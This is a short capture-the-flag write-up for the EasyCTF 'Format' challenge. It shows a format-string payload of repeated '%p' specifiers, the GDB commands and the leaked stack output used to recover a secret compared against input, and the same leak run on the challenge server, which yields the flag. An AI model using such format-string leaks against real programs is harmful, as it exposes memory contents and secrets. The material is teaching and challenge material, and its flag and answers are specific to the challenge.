Rating:
# EASYCTF - Format
With GDB, we put a breakpoint when the program compare the secret with our input.
`0x0000000000400917 <+144>: cmp eax,DWORD PTR [rbp-0x54]`
We display the content of the stack with the format string:
Input in GDB :
```
r < /tmp/f `python2 -c "print 'AAAA%p%p%p%p%p%p%p'*30+'\\nAAAA'" > /tmp/f
```
Output :
```
0x6d616e2072756f59(nil)(nil)0x7faa168845000x77(nil)0x1013f249000000000x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x70257025702570250x257025702570250xc7ae83a318d60c000x7ffce149c7a00x4009900x7ffce149c8880x1004007800x7ffce149c8800x3e8000000000x4009a00x7faa16302f4a(nil)0x7ffce149c8880x1000400000x40093d(nil)0x8b4728e5db7df7420x4007800x7ffce149c880(nil)(nil)
```
We look at the content of secret which is at $rbp-0x54 :
`x/ga $rbp-0x54`
`0x702570251013f249`
The program compare with eax. So we need to look at the 32 lowest bits of RAX.
So the secret is : `1013f249`
We look for the secret in the leak from the format string.
The content of secret is on 7th pointer.
We do the same on the server
```
user44798@shell:/problems/format$ ./format
Enter your name: %p%p%p%p%p%p%p
Your name is: 0x400a5a0x7ff00014c7800xe0x7ff0003697000xe(nil)0x732581c900000000
Enter your secret password (in hex)
732581c9
easyctf{p3sky_f0rm4t_s7uff}
```
